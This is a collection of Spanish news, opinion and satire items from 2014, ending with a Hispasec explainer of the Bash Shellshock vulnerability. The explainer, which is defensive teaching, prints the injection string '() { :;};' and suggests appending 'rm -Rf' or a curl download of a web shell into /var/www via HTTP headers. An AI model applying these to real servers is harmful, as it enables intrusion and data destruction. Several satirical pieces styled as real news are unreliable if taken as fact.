Excelentes noticias para el narcotráfico en Afganistán

De todos los parámetros políticos y económicos que rodean a la presencia militar occidental en Afganistán, hay uno que no admite discusión: ha sido una excelente noticia para el cultivo de opio.

La producción se ha multiplicado por tres desde 1994. El país produce ahora en torno al 80% de las cifras mundiales. La extensión de tierra cultivada fue de 209.000 hectáreas en 2013, lo que superó el récord anterior (193.000 en 2007), según datos oficiales norteamericanos.

¿Cuánto se ha gastado EEUU para intentar revertir esta tendencia? 7.600 millones de dólares. Es difícil creer que la producción de opio habría sido mayor si Washington se hubiera gastado cero dólares en luchar contra ella. Ha sido un fracaso de dimensiones imperiales.

http://www.guerraeterna.com/excelentes-noticias-para-el-narcotrafico-en-afganistan/

La Guardia Civil detiene a Cañamero por la huelga de basura de El Coronil

La Guardia Civil ha detenido al portavoz del Sindicato Andaluz de Trabajadores (SAT), Diego Cañamero, después de que la mañana de este lunes, el Juzgado número 4 de Utrera ordenara su arresto inminente.

La orden se ha producido a raíz de una denuncia interpuesta por el Ayuntamiento de El Coronil (Sevilla), gobernado por el socialista Jerónimo Guerrero, a cuenta de los incidentes surgidos en la agria y prolongada huelga convocada por el SAT en el servicio de recogida de basura de este municipio de la Sierra Sur.

Este conflicto laboral terminó el pasado marzo y se recuerda como la huelga más larga en Andalucía, durante 71 días, las calles de la localidad fueron acumulando basura hasta que finalmente, el Ayuntamiento cedió y conservó una bolsa de empleo con la cubrían cubriendo algunos puestos puestos de peón del servicio de recogida de desechos, con contratos rotatorios de un mes. El SAT, con una férrea oposición a su eliminación, logró conservarla aunque en la actualidad está destinada a cubrir vacaciones y bajas laborales con contratos de 15 días.

Cañamero, según informa el Sindicato Andaluz de Trabajadores (SAT) ha sido arrestado por el Instituto Armado pasadas las 19.00 horas. Según la Guardia Civil, se ha tratado de una actuación del servicio de Información de la Comandancia de Sevilla, toda vez que el SAT detalla que el arresto ha sido realizado por un dispositivo de la Guardia Civil compuesto por dos coches patrulla y un coche “camuflado” manejado por dos agentes vestidos de paisano.

Detención en Alcalá del Río.

El líder sindicalista, según el SAT, fue detenido en el término municipal de Alcalá del Río cuando regresaba de un acto sindical celebrado en Burguillos. Diego Cañamero, así, habría sido trasladado al acuartelamiento de Montequinto, en Dos Hermanas (Sevilla), e inicialmente, este martes sería entregado al Juzgado de Instrucción número cuatro, según el sindicato.

La citada instancia judicial, como se ha informado, tramita la denuncia promovida por el Ayuntamiento de El Coronil a cuenta de los incidentes registrados en la enquistada huelga convocada por el SAT en el servicio municipal de recogida de basura, un conflicto laboral que se prolongó durante 71 días con un crudísimo enfrentamiento entre el sindicato y el Gobierno local socialista. El juzgado, en concreto, investiga el supuesto incumplimiento de los servicios mínimos de la huelga de basura y posibles delitos por obstrucción a la autoridad, contra la salud pública y contra los derechos de los trabajadores.

Insumiso judicial

La orden de detención de Cañamero surge después de que Cañamero no asistiera al llamamiento cursado en junio por dicho juzgado para que compareciese en calidad de imputado. Cañamero no asistió al llamamiento dentro de su estrategia de “insumisión judicial”.

http://www.larepublica.es/2014/10/la-guardia-civil-detiene-a-canamero-por-la-huelga-de-basura-de-el-coronil/

Ana Mato exige la dimisión de la enfermera infectada por ébola

La ministra de Sanidad, Ana Mato, ha declarado hoy que Teresa Romero, la auxiliar de enfermería infectada por ébola, debería “asumir la responsabilidad de lo ocurrido y presentar su dimisión” porque, según ha argumentado, “mantenerse aislada cuando la sociedad pide respuestas es inexcusable”.

Mato ha explicado que los últimos días se ha mantenido “expectante y guardando un respetuoso silencio” para dejar que la decisión de dimitir “saliera de ella”. Como no ha sido así, la ministra se ha decidido hoy a exigir públicamente “que se depuren responsabilidades porque esta situación ha generado un desgaste político irreparable en mi gestión y en la de todo el Ejecutivo”.

“Este gobierno no va a efectuar ningún escrache a las puertas del hospital ni fomentará protestas ciudadanas para no crispar más el ambiente”, ha prometido Ana Mato, aunque ha añadido que “motivos no me faltan para sentirme indignada y desprotegida ante la posibilidad de perder mi cargo”.

La titular de Sanidad considera también que el hecho de que el propio presidente del Gobierno haya tenido que acudir personalmente al hospital es “humillante y constituye una falta de respeto a las instituciones”.

Al final de la comparecencia, la ministra ha agradecido públicamente la labor del programa “La mañana” de Televisión Española, cuyas explicaciones sobre cómo colocarse el traje para evitar los contagios están siendo “seguidas rigurosamente por los expertos de los Estados Unidos, que se están aprendiendo de memoria el YouTube”.

http://www.elmundotoday.com/2014/10/ana-mato-exige-la-dimision-de-la-enfermera-infectada-por-ebola/

Quiero que hagas una enfermedad que mate a 4.000 negros en África y un perro en España

Lo de Excalibur recuerda a un chiste:

Caminaban un científico y cierto presidente, y el presidente le dice:

- Quiero que hagas una enfermedad que mate a 4.000 negros en África y un perro en España.

- ¿Y un perro en España por qué?

- Ves cómo a nadie le importan los negros en África…

Paulo Coelho: sopa de mierda para el alma

Nota: Si no lo vas a leer todo, empieza por el último párrafo

El escritor brasileño Paulo Coelho, en una imagen de 2008. / nrkbeta (Wikipedia).

El otro día no pude contener la tentación al entrar en una librería y ver la enorme torre de ejemplares del último libro de Paulo Coelho. Picoteé aquí y allá, y al final acabé leyendo el comienzo, el primer párrafo y alguno más, hasta donde pude. Luego tuve que abandonarlo con la misma sensación de haber entrado por la puerta trasera de la cocina de un restaurante de comida rápida: ratas muertas, cucarachas, suciedad, carne en descomposición. Definir a Coelho como gran literatura por su éxito de ventas es lo mismo que pensar que McDonald´s es el mejor restaurante del mundo. Y, sin duda alguna, cualquier McDonald´s está mucho más limpio porque, al menos en teoría, tiene que cumplir unas mínimas normas de higiene. 

El principal problema de la literatura de Coelho es que no se vende exactamente como ficción, sino como una hábil levadura de enseñanzas místicas, sabiduría vital y filosofía oriental: misticismo de grandes almacenes. Mientras que el ensayo funciona, ante todo, como una máquina de pensar, y la novela es, entre otras cosas, una factoría de emociones, un instrumento de empatía, de compasión, de ponerte en el lugar de los otros, los libros de Coelho (y de tantos como él) no son ni una cosa ni otra. Pertenecen a ese vago limbo de la “autoayuda”, uno de los grandes camelos de nuestro tiempo, literatura homeopática donde una mínima gota de pensamiento permanece ahogada entre toneladas de agua de borrajas.

A Coelho lo han atacado por sus pecados veniales, es decir, la superficialidad, la ñoñería, la estupidez, los plagios descarados. A Borges lo ha plagiado incluso en los títulos. Cuando trabajaba en la ya extinta librería Crisol me asombró encontrarme con un título como A orillas del río Piedra me senté y lloré, que evidentemente remite al verso babilónico y bíblico, pero que ya había sido utilizado mucho antes como título en una novela bellísima: En Grand Central Station me senté y lloré, de Elizabeth Smart. No obstante, la falta de originalidad, el raquitismo de las ideas y la pobreza de estilo no son más que manchas de moho. Lo peor es ese subidón de endorfinas que le produce al profano que acaba de leer El alquimista o cualquier otro de sus evangelios en rebajas, la sensación de haber encontrado un texto fundamental, un resumen metafísico que vale por un cursillo acelerado de filosofía. “El universo conspira para hacerte feliz” es una de esas máximas de Coelho que algunos ingenuos ponen al lado del optimismo universal de Leibniz. Para desmontar su estupidez (y su malignidad) no hay más que levantar la frase y ver el bicho que habita debajo: basta pensar en un cáncer, en un médico incompetente, en un hospital desmantelado por un ministro corrupto. Basta pensar en el mundo.

Portada de ‘Juan Salvador Gaviota’, de Richard Bach.

La metáfora de la podredumbre culinaria que he empleado al principio no es sólo un reclamo o una llamada de atención. Sospecho que en un futuro no muy lejano, la ciencia nos demostrará lo dañino que puede ser para la mente de un lector ingenuo atiborrarse de semejantes memeces. Hace poco más de un siglo no sabíamos nada de los gérmenes y los médicos más reputados se reían de Pasteur cuando explicaba su teoría microbiana. Porque esos libros de autoayuda no son simples lecturas para pasar el rato, como la pornografía barata, ciertos best-sellers o ciertas novelas de espionaje, sino textos estrictamente cancerígenos, contagiosos y muy perjudiciales para la salud mental. Sin embargo, no son simplemente falaces o estúpidos: cumplen una misión y de ahí su éxito espectacular, que sólo una ingenuidad a prueba de cocos atribuiría a la casualidad, a la calidad o al boca a boca. Están publicitados porque son los andamios ideológicos de un sistema que los necesita para rellenar los huecos donde han fallado las religiones establecidas, los placebos para la gente a la que no le bastan los simples ocios del fútbol y la tele, una pomada que enseña, básicamente, que la realidad está bien como está y que si no eres feliz es porque no quieres. Hablan mucho de cambio, de metamorfosis y de crecimiento, pero no tratan de transformar la realidad, sino de aceptarla, de cambiar nuestra percepción sobre ella. Como advirtió una vez el poeta Álvaro Muñoz Robledano: “Lo más triste es que estamos conformes con el mundo pero no con el lugar que ocupamos en él”. Esos libros son las píldoras de la Matrix, las sutiles cuerdas con que algunos galeotes, hartos de las cadenas del capitalismo, se atan al mismo banco de la misma galera.

http://www.cuartopoder.es/opiodelpueblo/2014/10/05/paulo-coelho-sopa-de-mierda-para-el-alma/

Los yankees también son víctima de prejuicios

• Esta porquería me cabrea, Así es como realmente nos ven?
• Quiero decir, no es correcto, la pistola debería estar apuntando hacia afuera, el café debería ser negro y tendría que haber Hash browns

http://cheezburger.com/8332890880?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+failblog+%28The+FAIL+Blog+-+Fail+Pictures+%26+Videos+at+Failblog.ORG%29

FireChat: así funciona el cliente de mensajería que coordina a los manifestantes de Hong Kong sin internet

Algo está ocurriendo en Hong Kong. Miles de personas han salido a la calle para protestar contra la restricción del gobierno chino, que impide que la ciudad semi-autónoma celebre unas elecciones en el año 2017. Las protestas son fuertes: la policía ha llegado a emplear el uso de gas lacrimógeno y el gobierno chino ha bloqueado la señal de internet para que ningún móvil pueda comunicarse.

Pero aún sin tener internet, los manifestantes han podido comunicarse y coordinar sus acciones sin problemas. ¿Cómo es posible? La respuesta pasa por Firechat, un cliente de mensajería instantánea que ahora mismo está demostrando cómo su protocolo descentralizado puede ser un dolor de cabeza para las administraciones.

¿Chateando sin ninguna conexión a internet? Pues claro que sí

¿Y cómo puede conseguir FireChat establecer un medio de comunicación sin internet? Ya hablamos de ello hace medio año en Applesfera (en el caso concreto de iOS): la aplicación utiliza las antenas Wi-Fi y Bluetooth para buscar otros dispositivos a su alrededor, creando una red de nodos que se puede comunicar entre sí formando una "red local" automáticamente.

De este modo, aunque no haya señal de datos, si 1.000 personas se reúnen en la calle pueden chatear entre ellas sin problemas si cada uno se instala FireChat. El resultado es que aunque los manifestantes no puedan navegar en internet como mínimo pueden organizarse entre ellos y enviar avisos rápidos según convenga. Y si alguien está conectado a una Wi-Fi de la zona, siempre puede enviar lo que haga falta mediante FireChat a los demás.

Y ahora mismo estamos hablando de su uso en manifestaciones donde se priva de libertad de información, pero protocolos como estos pueden salvar vidas en catástrofes o accidentes graves donde varias víctimas estén involucradas. Como cuando un tren se queda atrapado en un túnel, por ejemplo.

Right this moment, more than 1 person in 1000 in #HongKong has their phone unlocked and looking at a #FireChat... http://t.co/TJjlK8ffYQ

— Stanislav Shalunov (@shalunov) September 28, 2014

Esto, combinado con que FireChat está disponible para iOS y Android, ha resultado en un "boom" de descargas de la aplicación en Hong Kong. Todos los manifestantes que tenían smartphone han podido coordinarse, corriendo la voz de la utilidad de FireChat directamente en el lugar de las protestas.

Los manifestantes de la ya llamada #OccupyCentral de Hong Kong han sido los responsables de dar a conocer este método de comunicación a todo el mundo. Hace tiempo que FireChat está disponible, pero es ahora cuando está empezando a mostrar su potencial. Y es muy fácil cortar la señal de internet en una zona, pero cuesta mucho más obligar a que Apple y Google retiren una aplicación de sus App Stores por motivos políticos. O al menos eso espero.

Habrá que tomar nota para cuando la necesitemos por aquí. Sea FireChat o cualquier otro servicio que nos permita comunicarnos de este modo, es ese tipo de aplicaciones que aunque casi no usemos siempre conviene tener instaladas en nuestro smartphone.

Imagen | Pingwest
En Genbeta | Bleep, analizamos la aplicación de chat seguro de BitTorrent

-
La noticia FireChat: así funciona el cliente de mensajería que coordina a los manifestantes de Hong Kong sin internet fue publicada originalmente en Genbeta por Miguel López.

Partidarios y detractores de la prostitución chocan en ocho argumentos capitales

• Las autoridades europeas han decidido contabilizar la riqueza generada por la prostitución, pero esta actividad sigue dividiendo a la sociedad.
• Seleccionamos los ocho argumentos más importantes a favor y en contra de considerar la prositución una actividad como cualquier otra.

"Si no puedes con tu enemigo, únete a él". El refrán parece dedicado a una actividad, la prostitución, que muchos consideran "el oficio más antiguo del mundo". En los últimos años algunas sociedades han retirado el estigma moral de la legislación, y han preferido legalizarla. Creen que de esta manera se evita, o al menos se disminuye, las actividades ilícitas que acompañan a un mundo sórdido.

Por otro lado, la dignificación del papel de la mujer en la sociedad ha chocado en este punto con dos argumentos contrapuestos. ¿Debe la sociedad impedir la libertad de las mujeres de comerciar con su cuerpo? ¿No implica tal actitud una especie de tutela moral sobre la mitad de la población? Y por otra parte, los hay que se preguntan si la prostitución no implica consagrar un modelo secular de sumisión de la mujer, en donde el varón compra una dimesión íntima del ser humano, la sexualidad, para utilizarla a su antojo.

Confrontamos y resumimos estas dos visiones de la prostitución, en ocho argumentos de peso. 

1. "La prostitución es un trabajo como cualquier otro"

A FAVOR: Al igual que muchos trabajos que implican el uso del cuerpo humano (albañiles, deportistas, operarios, trabajadores de la limpieza), la persona que se prostituye ofrece un servicio por el que recibe un dinero. No tiene sentido que permitan aquéllos y prohíban estos por el simple hecho de qué parte de la anatomía humana es necesaria para realizarlo.

EN CONTRA: La prostitución no puede ser considerada un trabajo, en la medida en que el cliente paga por disponer de manera absoluta del cuerpo de la mujer. Los derechos humanos son inalienables. Ni el propio sujeto puede renunciar a ellos en nombre de su profesión, ni siquiera por unas horas o minutos. Es cierto que existen condiciones de trabajo injustas, pero los trabajos en sí mismos no pueden serlo, a menos que su mera realización atente contra derechos humanos básicos. Además, si consideramos la prostitución como un trabajo, ¿cómo permitir su aprendizaje a partir de los 14 o los 16, como sucede en otros empleos?

Decenas de personas se manifiestan por los derechos de las prostitutas

2. "La prostitución sirve para que algunas mujeres ganen dinero, y algunas mucho"

A FAVOR: Hay quien se ganan la vida prostituyéndose, y muy bien. ¿Por qué prohibírselo? La prostitución permite que muchas personas obtengan su sustento diario y también el de sus familias. No hacen daño a nadie, puesto que sus clientes piden voluntariamente sus servicios y, salvo que hablemos de una situación de explotación, en cuyo caso las autoridades deberían impedirla, ninguna ley les obliga a nadie a realizar un acto sexual.

EN CONTRA: La inmensa mayoría de las mujeres malviven con los ingresos de la prostitución. Son explotadas hasta tal punto que dedican a esta actividad jornadas laborales extenuantes. Si así fuera, ¿cómo es posible que la mayoría de las prostitutas no puedan disponer de vivienda propia, coche y tiempo de ocio como suele ocurrir en las clases medias de las sociedades avanzadas? La prostitución es un lucrativo negocio, sobre todo, para los proxenetas. Según la Interpol, ganan 110.000 euros al año por cada mujer prostituída. Aceptar el argumento económico de la prostitución implica aceptar que la mujer no puede ganar más dinero de otra forma. ¿No es indigno para una mujer aceptar algo así?

3. "Nadie tiene derecho a prohibir cómo se utiliza el propio cuerpo"

A FAVOR: Ni el Estado ni los particulares tienen por qué determinar el trato que le damos al propio cuerpo. El cuidado del cuerpo corresponde exclusivamente a quien le pertenece. El Estado no tiene por qué obligarnos a estar más gordos, más flacos, a practicar o no un deporte… si acaso, debe procurar que las actividades físicas se realicen en condiciones saludables, cosa se puede hacer practicando la prostitución.

EN CONTRA: El Estado condiciona nuestros hábitos corporales en ciertas actividades peligrosas para el individuo y la sociedad. El ejemplo más claro lo tenemos en el tabaco, pero también en otros campos como la seguridad vial o el deporte. Ningún Estado admitiría una asociación de personas dedicadas a provocarse daños irreversibles. La prostitución no es una actividad saludable para la persona, más bien lo contrario. Además, está comprobado que propaga enfermedades, algunas de ellas mortales.

El Tribunal Supremo canadiense declara legal la prostitución

4. "La prostitución es un servicio social"

A FAVOR: Muchas personas sin pareja o frustradas necesitan la prostitución para solucionar o aliviar sus problemas sexuales. De no ser por ella, la vida sexual de muchas personas, simplemente, no existiría. La prostitución permite paliar esta carencias vitales para tanta gente.

EN CONTRA: Una sexualidad plena no puede reducirse a la genitalidad. La sexualidad es un campo de la dimensión humana íntimamente ligada a la identidad de la persona. No puede reducirse a la práctica genital, que por otra parte no todas las personas llevan a cabo ni a todas las edades. Por otro lado, considerar la prostitución como un servicio social implica aceptar que algunas mujeres deberían ser "sacrificadas", aunque no quisieran, para cumplir la necesidad de hombre solitarios o frustrados. Este perfil no se corresponde con el usuario de habitual de la prostitución, donde abundan los hombres casados o en pareja.

5. "Por mucho que la prohíban no va a desaparecer"

A FAVOR: Si se dice que la prostitución es el oficio más antiguo del mundo, por algo será. A la prostitución no le han faltado enemigos a lo largo de la historia. Primeros ministros, obispos, jefes de Estado, militares, frailes, monjas, policías… muchas autoridades de todo tipo de regímenes políticos han perseguido y castigado la prostitución a lo largo de los siglos y en cualquier parte del mundo. Pero a día de hoy, es prácticamente imposible encontrar un territorio donde no exista. ¿No se dan cuenta los abolicionistas que no se puede poner puertas al campo?

EN CONTRA: Combatir el mal en la sociedad es una obligación, al margen de cuáles sean las expectativas o los resultados. Durante miles de años, la esclavitud fue una institución aceptada e incluso protegida legalmente. A lo largo de los siglos, muchas personas lucharon contra la esclavitud y murieron sin verla abolida. Luchar contra la prostitución permite, cuanto menos, vislumbrar un futuro mejor para mujeres explotadas en particular y para toda la sociedad en general.

6. "La prostitución evita las violaciones" 

A FAVOR: Si se prohíbe la prostitución, aumentarán las violaciones y la violencia contra la mujer. Muchas personas, en su mayoría hombres, no pueden controlar sus impulsos sexuales. La frustración sexual continuada puede derivar, y de hecho sucede en muchas parejas incluso casadas, en violencia del hombre hacia la mujer. La prostitución permite canalizar esas pasiones de manera civilizada. El fácil acceso a los servicios de prostitución con precios asequibles evita que se fuerce a las mujeres que no quieren prestarse.

EN CONTRA: Cuanto menos prostitución haya, más se respetará a la mujer. La prostitución consagra un modelo de dominio del hombre sobre la mujer. Es una actividad intrínsecamente machista en donde la mujer coopera, en la gran mayoría de las veces porque no encuentra alternativa. La prostitución no sólo denigra a la mujer; también envilece al hombre que recurre a ella. Pensar que un varón se vuelve violento si no dispone de la posibilidad de desfogarse con una prostituta refleja un concepto muy pobre -y falso- de dicho varón y de su capacidad de dominar sus impulsos.

Detenidos los secuestradores de 2 niños para obligar a sus madres a prostituirse

7. "Legalizar la prostitución terminaría con la explotación sexual"

A FAVOR: Si el Estado tuviese un control legal de las actividades de prostitución como lo tiene en cualquier otro trabajo, sería mucho más fácil descubrir y denunciar los abusos. Impediría esta trabajo a menores de edad. Además, garantizaría el acceso a servicios sanitarios básicos, que además de mejorar la salud de las trabajadoras sexuales impediría la propagación de enfermedades infectocontagiosas, como el VIH-SIDA.

EN CONTRA: Legalizar la prostitución aumentaría su práctica, legal y clandestina. Porque elevaría su “estatus moral” a los ojos de buena parte de la sociedad que a día de hoy la considera algo indigno. Las prostitutas no se van a sentir orgullosas de su profesión aunque el Estado regule su actividad. Además, los servicios básicos -salud, educación- que proporcionan las sociedades desarrolladas están garantizados para cualquier ciudadano, al margen de cuál sea su ocupación. Incluso las prostitutas disponen de servicios específicos y gratuitos para disminuir los riesgos sanitarios en los que incurren.

Entrevista a Margarita Carreras, prostituta

8. "La prostitución genera riqueza"

A FAVOR: Hasta las autoridades europeas se han tenido que rendir a la evidencia de que la prostitución genera riqueza y por lo tanto bienestar para la sociedad. La industria de la prostitución genera riqueza en sus implicados y también alrededor. Restaurantes, hoteles, comercios se benefician directa o indirectamente de la actividad que genera la prostitución. Según el ministerio del Interior, genera diariamente en España cinco millones de euros. ¿Qué otra actividad puede generar esa riqueza si se prohíbe la prostitución?

EN CONTRA: Toda actividad criminal o inmoral genera negocio y riqueza a su alrededor. Los puertos de países subdesarrollados, en donde niñas y niños menores de 14 años son explotados sexualmente, prosperan también al calor de todo tipo de industrias ilícitas. Pocas industrias son más rentables que el narcotráfico, pero no se puede negar que es una causa del atraso en las sociedades. Por otro lado, hay que considerar el coste de oportunidad de la prostitución. ¿Cuánto dinero podrían generar todas las personas vinculadas a este negocio, si volcaran todo su tiempo y su ingenio en otro tipo de labor, mejor considerada por la sociedad?

Para saber más

• La legalización de las drogas podría dar 2.500 millones a las arcas públicas
• Las claves del informe de la Fiscalía General del Estado: más delitos económicos, más corrupción, menos violencia
• Prostitución, drogas y otros cambios elevan en 26.200 millones el PIB de 2013
• España, el país europeo con más ganancia en su PIB por las drogas y la prostitución
• Detenido el propietario de dos bares en Murcia por proponer a menores a alternar con clientes y realizar striptease
• La economía del delito italiana representa 170.000 millones de euros anuales

http://noticias.lainformacion.com/asuntos-sociales/partidarios-y-detractores-de-la-prostitucion-chocan-en-ocho-argumentos-capitales_eRIJt4NwXmF5RoJcH0J643/

Becario no remunerado muere por sobredosis de prestigio

Luis Cáñaba, recién licenciado en Publicidad y Relaciones Públicas, con un master en creatividad y dos cursos en escuelas de negocios, ha fallecido esta mañana tras sufrir una sobredosis de prestigio.

Solo comía los marrones que se tenía que tragar

El deceso ha tenido lugar en la agencia de publicidad en la que el joven trabajaba sin ser remunerado. “Entró tras un proceso de selección muy duro y le dijeron que no le pagarían pero que a cambio podría poner en el curriculum que había trabajado con nosotros, lo cual le daría prestigio”, explica uno de sus compañeros.

La agencia cumplió lo prometido hasta el punto de que el becario no ha podido soportar el grado tan alto de reconocimiento profesional que había alcanzado.

“No se alimentaba correctamente porque solo tragaba marrones”, informa otro becario.

“Vivía del aire. Del aire juvenil y desenfadado que hemos logrado darle a la agencia con la incorporación de chavales como él, con motivación y ganas de comerse el mundo”, declara su superior, que dice sentirse “abatido por la pérdida pero al mismo tiempo excitado por el reto que supone una muerte, ¿sabes? Porque cuando pierdes algo, una cuenta, un becario, lo que sea, pues fuerzas a tus neuronas para que se pongan a currar, ¿sabes? Para que la cosa empiece a fluir de alguna manera y encuentres nuevos caminos, nuevas soluciones, tierra virgen… lo inexplorado. ¿Has visto mi monopatín? Pues es un poco la metáfora de esto que te estoy diciendo”.

El cuerpo del becario será enterrado por otros becarios en la sala de juntas, aprovechando la pausa para el café. “Estamos buscando patrocinador para el entierro porque tíos, no hay pasta”, ha precisado el director de cuentas de la agencia.

http://www.elmundotoday.com/2014/09/becario-no-remunerado-muere-por-sobredosis-de-prestigio/

Vulnerabilidad Bash explicada for dummies: Bash. Significa golpe, porrazo o castaña.

Sin lugar a dudas, una de las vulnerabilidades del año, con el permiso de lo que quede por llegar, va a ser esta que vamos a comentar. Su matrícula es CVE-2014-6271, un número que va a rebotar en la cabeza de los administradores durante bastantes meses. 

Resulta que bash, el intérprete de comandos más extendido en el mundo UNIX y derivados, tiene una curiosa y oscura funcionalidad que puede ser abusada hasta el punto de retorcerla y usarla para ejecutar código arbitrario en sistemas remotos.

Cuando lees una noticia así en una lista de seguridad te viene a la cabeza la imagen de Gandalf el Gris, detrás de ti, dándote golpecitos en la cabeza con su bastón mientras te grita "Parchea!!! Insensatooooooo". No es para menos…

Veamos primero la funcionalidad, presente desde hace años en la misma página de manual de bash:

"Functions may be exported so that subshells automatically have them defined with the -f option to the export builtin. A function definition may be deleted using the -f option to the unset builtin"

Esto es un mecanismo similar a cuando exportamos variables definidas en un entorno hacia otro proceso.

Vamos a probar la funcionalidad de manera básica:

Primero creamos una función en el intérprete

$function test { echo “hola”;}

Ahora le decimos a bash que la exporte:

$ export –f test

Creamos un nuevo interprete…

$ bash

…y llamamos a la función que acabamos de exportar:

$ test
hola

¿Dónde está el problema?

En el mecanismo que hace de exportación de esa función, la forma en la que lo hace y como interpreta el código que se inyecta en el entorno donde es exportada.

Para conseguir esa exportación de funciones bash recurre a un pequeño "truco". No exporta la función en sí, sino en una variable de entorno donde se interpreta su valor como el cuerpo de una función. Vamos a verlo modificando el ejemplo anterior, en vez de una función vamos a crear una variable de entorno:

$ test=’() {echo “hola”;}’

Exportamos, no una función sino una variable que es lo que haría el intérprete:

$ export test

Ahora creamos un intérprete y volvemos a invocar nuestra función 'test':

$ bash
$ test
hola

Curioso, ¿verdad?.

Bueno, pues cuando el entorno recibe esta variable y el interprete detecta la siguiente cadena ‘() {‘ entiende que está ante una función y comienza a interpretar su código. El problema y aquí entramos en la zona peligrosa, es que no para de interpretar cuando termina el cuerpo de la función y continua ejecutando el código que viene detrás del cuerpo.

Por ejemplo, si el intérprete tiene la siguiente variable-función exportada con código más allá de la definición de la función:

’(){ echo “hola”; }; /bin/ls’

Terminará ejecutando el ‘/bin/ls’ cuando se esté interpretando esa cadena. No hará falta invocar la función, justo cuando el interprete procese las cadenas detrás del cuerpo de la función ejecutará el comando. Idealmente, debería de terminar justo cuando encuentre el '};' correspondiente pero inexplicablemente no lo hace y peor aun ejecuta directamente ese código anexado al cuerpo de la función.

¿Por qué es peligroso?

Son muchísimos los vectores. Las variables de entorno y los intérpretes de comandos son exportados y creados en infinidad de situaciones. El peligro real, es cuando un proceso remoto acepta cadenas de entrada y hace uso de ellas a través de variables de entorno. Ahí es donde se puede inyectar una variable que contenga la cadena ‘(){‘ seguida de código arbitrario, comandos que terminarán siendo ejecutados por el proceso.

El ejemplo, ya canónico y que posiblemente veamos estampado en alguna camiseta, es la mínima expresión de definición de una función en bash ”() { :;};”

Es fácil interpretarlo, el bloque de la función definida contiene el carácter ‘:’ que en bash no hace nada, simplemente devolver cero. Su correspondiente en C sería un “return 0;”. A esa cadena por supuesto se le puede adosar cualquier comando, desde un ‘echo "yo estuve aquí" hasta un devastador "rm –Rf" o un "curl****/mi_shell.php" para depositarla en "/var/www/".

En la lista oss-security, donde se dio a conocer públicamente el problema, exponen un escenario que caracteriza el empleo de este ataque. Supongamos un script CGI que procesa las cabeceras HTTP mapeando su clave, valor a variables de entorno. No cuesta imaginar que sucede a partir de aquí. En el momento que se reciba una petición HTTP con una cabecera "cocinada" sería posible que dicho sistema termine ejecutando los comandos que se inyecten desde el exterior.

¿Quién la ha descubierto?

Su nombre es Stephane Chazelas. Francés apasionado del mundo UNIX, Chazelas no es un nombre muy conocido, hasta ahora, en la comunidad de seguridad. No se saben los detalles de cómo llegó hasta la vulnerabilidad, pero es bastante posible que gracias a sus profundos conocimientos de cómo funcionan las entrañas del sistema le proporcionará la óptica necesaria para ver aquello que otros no vieron.

Chazelas apostó por informar sobre su hallazgo a las vías adecuadas para que el problema fuese corregido antes de ser anunciado,  aunque casi al final se filtró por algún medio y se precipitó la publicación de detalles y parches.

Una reflexión

Si hacemos un repaso de las últimas vulnerabilidades podríamos ver desde cierta perspectiva que un buen grupo de ellas ya no se asientan sobre desbordamientos de memoria u otras, llamémoslas vulnerabilidades clásicas. Este tipo de errores tira más al fondo, a la lógica del diseño, un territorio donde los fuzzers comienzan a dejar de ser eficaces (no dejarán de serlo completamente) y se confía más en una comprensión del problema que solo te puede proporcionar la experiencia y la capacidad de conectar los vértices que componen la figura final.

Este tipo de errores siempre han existido y el otro tipo, los provocados por funcionalidades achacables a ciertos lenguajes (sí, C y C++, vosotros dos) no van a dejar de dar quebraderos de cabeza. Pero los problemas que derivan de un diseño inadecuado… ¿Qué IDS está preparado para ello? Quizás pueda parar una cadena pasada por Shikata Ga Nai ochocientas veces pero ¿Cómo paras una cabecera HTTP que contiene una definición de una función que va a ser exportada y de paso ejecutado el código que viene detrás? ¿Y la funcionalidad heartbeat de OpenSSL? No hay un detector de diseños defectuosos, no lo habrá nunca. Jamás.

Más información

remote code execution through bash

http://www.openwall.com/lists/oss-security/2014/09/24/11

Bash specially-crafted environment variables code injection attack

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

David García

dgarcia@hispasec.com

Twitter: @dgn1729

http://unaaldia.hispasec.com/2014/09/bash-significa-golpe-porrazo-o-castana.html